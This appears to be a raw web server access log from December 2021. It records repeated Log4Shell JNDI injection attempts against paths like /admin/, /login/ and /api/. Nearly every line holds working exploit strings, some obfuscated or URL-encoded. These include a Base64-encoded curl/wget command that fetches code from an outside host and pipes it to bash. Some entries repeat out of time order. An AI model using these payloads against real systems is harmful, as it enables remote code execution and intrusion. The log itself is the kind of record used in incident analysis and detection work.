195.54.160.149 - - [19/Dec/2021:23:47:39 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [19/Dec/2021:23:47:40 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
95.214.235.219 - - [20/Dec/2021:09:33:08 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&f=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 464 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:09 +0000] "GET /?x=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&f=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 200 5382 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:09 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&f=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 464 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:10 +0000] "GET /?x=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&f=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 200 5382 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:10 +0000] "GET /admin/ HTTP/1.1" 302 211 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:11 +0000] "GET /admin/ HTTP/1.1" 404 204 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:11 +0000] "POST /admin/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 730 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:12 +0000] "GET /admin/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 204 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:12 +0000] "GET /v1/ HTTP/1.1" 302 208 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:13 +0000] "GET /v1/ HTTP/1.1" 404 201 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:13 +0000] "POST /v1/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 727 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:13 +0000] "GET /v1/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 201 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:14 +0000] "GET /v2/ HTTP/1.1" 302 208 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:14 +0000] "GET /v2/ HTTP/1.1" 404 201 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:14 +0000] "POST /v2/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 727 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:15 +0000] "GET /v2/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 201 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:15 +0000] "GET /login/ HTTP/1.1" 302 211 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:16 +0000] "GET /login/ HTTP/1.1" 404 204 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:16 +0000] "POST /login/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 730 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:17 +0000] "GET /login/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 204 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:17 +0000] "GET /api/ HTTP/1.1" 302 209 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:18 +0000] "GET /api/ HTTP/1.1" 404 202 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:18 +0000] "POST /api/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 728 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /api/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 202 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /console/ HTTP/1.1" 302 213 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /console/ HTTP/1.1" 404 206 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:20 +0000] "POST /console/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 732 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:20 +0000] "GET /console/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 206 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:21 +0000] "GET /api/v1/ HTTP/1.1" 302 212 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:21 +0000] "GET /api/v1/ HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "POST /api/v1/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 731 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "GET /api/v1/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /console/ HTTP/1.1" 302 213 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:19 +0000] "GET /console/ HTTP/1.1" 404 206 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:20 +0000] "POST /console/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 732 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:20 +0000] "GET /console/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 206 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:21 +0000] "GET /api/v1/ HTTP/1.1" 302 212 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:21 +0000] "GET /api/v1/ HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "POST /api/v1/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 731 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "GET /api/v1/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:22 +0000] "GET /api/v2/ HTTP/1.1" 302 212 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:23 +0000] "GET /api/v2/ HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:23 +0000] "POST /api/v2/?username=%24%7Bjndi%3Aldap%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&password=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&userid=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D&id=%24%7Bjndi%3Armi%3A%2F%2Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%2Fa%7D HTTP/1.1" 302 731 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
95.214.235.219 - - [20/Dec/2021:09:33:24 +0000] "GET /api/v2/?username=%2524%257Bjndi%253Aldap%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&password=%2524%257B%2524%257B%253A%253A-j%257Dndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&userid=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D&id=%2524%257Bjndi%253Armi%253A%252F%252Ff3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com%252Fa%257D HTTP/1.1" 404 205 "${jndi:ldap://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}" "${${::-j}ndi:rmi://f3505f6b-fe49-444b-887a-c47497467400.d.system-gateway-online.com/a}"
47.241.208.155 - - [20/Dec/2021:10:02:42 +0000] "GET /${jndi:ldap://185.246.87.50:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
47.241.208.155 - - [20/Dec/2021:10:02:42 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://185.246.87.50:1389/Exploit}"
